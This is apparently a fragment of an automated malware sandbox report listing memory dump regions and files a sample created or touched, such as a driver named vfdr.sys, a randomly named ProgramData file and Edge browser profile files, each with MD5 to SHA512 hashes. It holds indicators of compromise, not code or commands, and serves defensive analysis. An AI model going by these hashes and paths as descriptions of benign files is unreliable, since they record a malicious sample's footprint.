| SHA256 | e5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 |
| SHA512 | 871250ed8779d3f6e0adde5b1e9be0b818e157dfd1ea3755c161fc6604185370a55fa0b37c2b9249b05dc5da6182e7be6b2a5ade0b67e104e8d9cea01eae2f94 |
memory/5660-3287-0x0000000000400000-0x00000000005D4000-memory.dmp
memory/3916-3289-0x00007FF6D5A50000-0x00007FF6D63A0000-memory.dmp
memory/3916-3288-0x00007FF830530000-0x00007FF830532000-memory.dmp
C:\Windows\System32\drivers\vfdr.sys
| MD5 | 6106653b08f4f72eeaa7f099e7c408a4 |
| SHA1 | 0e84aff18d42fc691cb1104018f44403c325ad21 |
| SHA256 | 96b77284744f8761c4f2558388e0aee2140618b484ff53fa8b222b340d2a9c84 |
| SHA512 | 92b20c99f96907eea3818ba36516e5fa8b5e6ff7a2981177115633e11ba23f9e5a4aa0e8e9d7d8c448e9d5d8fa5e0eb75e44694942f5e4da98a85419db126162 |
C:\ProgramData\TywqfYfUij\UyHosmin
| MD5 | 70638e8d022aad237149c976a5fb76fe |
| SHA1 | d9efcfd0628d2906ac8b2457137aeec0f85849dd |
| SHA256 | ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92 |
| SHA512 | 6615c451bf6b4cf866be8b5d9555aca2ba7c66e9ee206fb50f75b4d8cd0d72335beecb90fc18f4b1a85889203b14f4174725c91dc63a25f6c77c0edfa483e0e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 275f488816b3916768a45c0a49eee28d |
| SHA1 | 51c77a40232eb15d6254f804ae10db2972d66b5f |
| SHA256 | bd7a193878d87f870f6ea718f1b05dba798e82598f8409c0dbcba4b580875bf9 |
| SHA512 | b22d4eb74ae881ff3216671ee4f06e00ddb2206c0fa7e651949e0458aaf1331c0d9cca0b0a91be202567c1782acc8996cc74246e01630ed669fcfad8523cf032 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | baa78e296124f0aa0f845f478bb23dfc |
| SHA1 | 4decf288fc86b2b3d3ac82b71fa9e12eaf7ac439 |
| SHA256 | 35f05c0bde2279c02f339552b1e38f943be1c99f90a60102fb1fd271aaba5f54 |
| SHA512 | 6d464103485a3d452a6c1889b1182ef030edb8adc0cf1f62dcd1e8ee39220871b355e122c818a0bc4dd96558815c51c1ef4a7548edbe8262e2dd5e847c8c5ca9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e57935dcc7156cf77c626e07f09def35 |
| SHA1 | 7c68ed0dabcacea17675a24dab7ef3c0d5782059 |
| SHA256 | 2fe701be566bf8cfa05a1b218b45bfcbda933c88d4888c2be2b92aecea7ed7c0 |
| SHA512 | 39a66771a2bf824a9b107c0572f3480059b261c974cd666427f1f950ba21d5fff876cfb0f21ce185794766c1ffd65e28b3166c276ebc04342ec5d6b2bf2b2dc0 |